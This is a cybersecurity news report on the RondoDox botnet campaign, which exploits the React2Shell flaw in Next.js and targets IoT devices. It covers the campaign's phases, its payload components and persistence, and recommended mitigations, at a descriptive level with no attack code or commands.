Cybersecurity researchers have uncovered details of a persistent, nine-month-long campaign that actively targets Internet of Things (IoT) devices and web applications to conscript them into a botnet known as RondoDox.
As of December 2025, attackers have leveraged the recently disclosed React2Shell (CVE-2025-55182, CVSS score: 10.0) vulnerability as an initial access vector, according to an analysis from CloudSEK.
React2Shell Emerges as a Critical Initial Access Vector
React2Shell refers to a critical security flaw affecting React Server Components (RSC) and Next.js that allows unauthenticated attackers to execute arbitrary code remotely on vulnerable systems.
Meanwhile, data from the Shadowserver Foundation indicates that approximately 90,300 instances remain exposed to the vulnerability as of December 31, 2025. Notably, 68,400 instances operate in the U.S., followed by Germany (4,300), France (2,800), and India (1,500).
Since its emergence in early 2025, RondoDox has steadily expanded its reach by incorporating new N-day vulnerabilities into its exploit arsenal, including CVE-2023-1389 and CVE-2025-24893. Importantly, Darktrace, Kaspersky, and VulnCheck previously documented the abuse of React2Shell to propagate the botnet.
Multi-Phase Attack Progression Observed
Analysts assess that the RondoDox botnet campaign progressed through three distinct phases prior to exploiting CVE-2025-55182:
- March – April 2025: Initial reconnaissance and manual vulnerability scanning
- April – June 2025: Daily mass probing of web applications such as WordPress, Drupal, and Struts2, alongside IoT devices including Wavlink routers
- July – early December 2025: Hourly, large-scale automated deployment
In attacks Observed during December 2025, threat actors Initiated scans to identify vulnerable Next.js servers and subsequently Attempted to deploy Cryptocurrency miners (“/nuts/poop”), a botnet loader and Health-check utility (“/nuts/bolts”), and a Mirai botnet variant (“/nuts/x86”) on Compromised systems.
Botnet Loader Eliminates Rivals and Establishes Persistence
The “/nuts/bolts” component actively removes competing malware and coin miners before Downloading the primary bot payload from its Command-and-control (C2) server. Researchers identified one variant that Eradicates known botnets, Docker-based Payloads, Remnants of earlier campaigns, and associated cron jobs, while simultaneously Establishing Persistence via “/etc/crontab.”
“It continuously scans /proc to enumerate running executables and kills non-whitelisted processes every ~45 seconds, effectively preventing reinfection by rival actors,” CloudSEK said.
Recommended Mitigation Measures
To reduce exposure to this threat, security teams should immediately update Next.js to a patched release, segment IoT devices into dedicated VLANs, deploy Web Application Firewalls (WAFs), closely monitor for suspicious process execution, and block known RondoDox C2 infrastructure.
Source: TheHackerNews
Read more at Impreza News
